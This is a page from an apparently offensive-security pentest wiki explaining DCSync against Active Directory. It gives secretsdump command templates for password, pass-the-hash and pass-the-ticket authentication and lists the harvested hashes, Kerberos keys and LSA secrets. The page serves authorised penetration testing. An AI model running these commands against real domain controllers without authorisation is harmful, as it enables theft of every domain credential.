Pentest List Wiki
  • What is Pentest List Wiki?
  • OFFENSIVE SECURITY
    • External Infrastructure
      • Discovery
        • Email Address Discovery
        • Subdomain Discovery
        • Data Discovery
        • Port & Service Discovery
      • Exploitation
        • Password Spraying
        • Vulnerability Scanning
    • Internal Infrastructure
      • General Discovery
        • AD Attack Path Discovery
        • Port & Service Discovery
      • Credential Discovery
        • Passwords and NetNTLM
        • SAM & LSA secrets
        • NTDS.dit secrets
        • LSASS secrets
        • DCSync
        • DPAPI secrets
      • Movement
        • Credential Spraying
        • SMB Relaying
        • Pass The Hash
      • Infiltration/Exfiltration
        • Pivoting (Proxying)
    • Web Application
      • Discovery
        • Testing API Keys
        • Vulnerability Scan
        • Web Content Discovery
        • Parameter Discovery
        • VHOST Discovery
        • CMS Scanners
      • Exploitation
        • Authentication
          • Email Address Forms
          • AWS Cognito
        • JSON Web Tokens
        • Injection Attacks
          • SQL Injection
          • Cross-Site Scripting
          • HTTP Headers
      • Bypasses
        • Cloudflare Bypass
        • HTTP 403 Bypass
    • Mobile (iOS/Android)
      • iOS
        • IPA Decryption
        • Filesystem Analysis
        • Static Analysis
    • Cloud
      • AWS
        • Vulnerability Scanners
        • S3 Buckets
      • Azure
        • Vulnerability Scanners
        • m365 & Entra ID
  • DEFENSIVE SECURITY
    • Forged Kerberos Tickets
    • Logon Event Visualisation
Powered by GitBook
On this page
  • Overview
  • Remotely performing a DCSync
  • secretsdump output
  1. OFFENSIVE SECURITY
  2. Internal Infrastructure
  3. Credential Discovery

DCSync

How to find sensitive data using a DCSync.

Overview

A DCSync is similar to dumping a NTDS.dit file. However, rather than copying and extracting data from NTDS.dit, DCSync uses Windows APIs with the domain controller to replicate the domains data.

To conduct this account, a domain administrator is requried or a user with the privileges: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All.

Remotely performing a DCSync

The easiest way to perform a DCSync is to use secretsdump.

secretsdump.py performs various techniques to dump password hashes and secrets.

  • https://github.com/fortra/impacket/blob/master/examples/secretsdump.py

DCSync using a plaintext password

secretsdump -outputfile 'data' <DOMAIN>/<USER>:<PASSWORD>@<DOMAINCONTROLLER>

DCSync using Pass-the-Hash

secretsdump -outputfile 'data' -hashes <LMhash>:<NThash> <DOMAIN>/<USER>@<DOMAINCONTROLLER>

DCSync using Pass-the-Ticket

secretsdump -k -outputfile 'data' <DOMAIN>/<USER>@<DOMAINCONTROLLER>

secretsdump output

The secretsdump script will output the following files from the DCSync:

  • .ntds

    • LM and NT password hashes which can be used with hash cracking.

  • .cleartext

    • Passwords stored using reversible encryption

  • .kerberos

    • Kerberos keys (DES, AES128 and AES256)

  • .sam

    • Domain controller's SAM secrets

  • .secrets

    • Domain controller's LSA secrets

PreviousLSASS secretsNextDPAPI secrets

Last updated 10 months ago